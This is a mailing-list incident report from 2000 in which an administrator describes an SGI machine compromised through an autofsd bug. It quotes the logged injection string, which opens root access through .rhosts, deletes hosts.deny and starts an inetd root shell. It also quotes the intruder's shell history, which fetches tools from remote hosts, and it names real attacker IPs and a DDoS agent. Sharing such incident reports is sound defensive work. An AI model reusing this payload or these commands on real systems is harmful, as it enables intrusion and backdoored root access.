Security Incidents mailing list archives
Hacked by the script kiddie - an ordinary netadmin's day
From: urbanec () CIV ZCU CZ (Jakub Urbanec)
Date: Wed, 21 Jun 2000 10:40:32 +0200
Hi, One of our machines was hacked on Jun 6 by (probably) the script kiddie from 216-119-26-75.o1.jps.net :-( Fortunately he/she left almost everything we needed for identifying the source of the attack - full syslog dump, history file, suid binaries, backdoor binaries. <attention>Full names/IPs included!</attention> The method of the hack was an old good SGI autofsd bug - more in syslog: autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; \ echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob followed by: login[85169]: root () 216-119-26-75 o1 jps net as root After he/she added a user 'adm' (thanks for history file!) and installed binaries - Interesting one is trinoo (DDOS) agent. (as well as 'cocaine', 'gibd00r?', bind shell) So, here's the history file of user 'adm': # /bin/ls -C $*; } # nslookup our.machine.here # ft # cd /dev/chr # ftp charlie.cns.iit.edu # chmod +sx * # ./eggdrop doomed.tcl # exit # /bin/ls -C $*; } # ./c # /bin/ls -C $*; } # cd /tmp # ls # rcp enter@208.243.33.204:/usr/people/enter/irix/c c; chmod 755 c; # ./c 212.179.33.90 23 # ./c 63.236.135.128 23 # /bin/ls -C $*; } # ls # ./c 216.98.156.92 23 # where ./c is probably 'cocaine' (courtesy of 'strings' - I'm damn sure I have seen this application before, but I couldn't find any info about it - does anybody have a clue?). I have binaries and logs, I can put them on the web if anybody needs it. sorry about the lengthy email, but I think you can be interested in how the script kiddies work and DDoS tool gets installed. P.S. I. the hacked machine was taken down and installed from the scratch P.S. II. IP/hosts mentioned above were already noticed about this incident P.S. III. Never plug default installed SGI box into public net: "...vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great job of making it eeeeeeasy" all over the place..." "Playing redir games with ARP and ICMP" by Yuri Volobuev Jakub CUBA++ Urbanec -- ................................................................. Univerzitni 20 tel.:+420-19-7491538 Jakub Cuba++ Urbanec 306 14, Plzen http://home.zcu.cz/~urbanec LPS-CIV-ZCU Czech Republic
Current thread:
- "Quova.net" (Exodus downstream customer) Missouri FreeNet Administration (Jun 17)
- Re: Quova.net M J (Jun 20)
- Re: Quova.net Fabio Bastiglia Oliva (Jun 20)
- Re: Quova.net Brett Glass (Jun 20)
- Hacked by the script kiddie - an ordinary netadmin's day Jakub Urbanec (Jun 21)
- SV: Hacked by the script kiddie - an ordinary netadmin's day Kim C. Saxvik (Jun 23)
- Addendum: scanned - strange! Sir Scriptzalot (Jun 21)
- Re: Quova.net Fabio Bastiglia Oliva (Jun 20)
- Re: Quova.net Valdis Kletnieks (Jun 20)
- Re: Quova.net M J (Jun 20)
- <Possible follow-ups>
- Re: "Quova.net" (Exodus downstream customer) Rune Kristian Viken (Jun 20)
- Re: "Quova.net" (Exodus downstream customer) Missouri FreeNet Administration (Jun 22)
- Re: "Quova.net" (Exodus downstream customer) Cold Fire (Jun 23)
- Interesting research paper Alfred Huger (Jun 25)
- DOS attack Bogdan Catalin Donici (Jun 26)
- Re: "Quova.net" (Exodus downstream customer) Missouri FreeNet Administration (Jun 22)
- Re: "Quova.net" (Exodus downstream customer) Nicholas de Jong (Jun 20)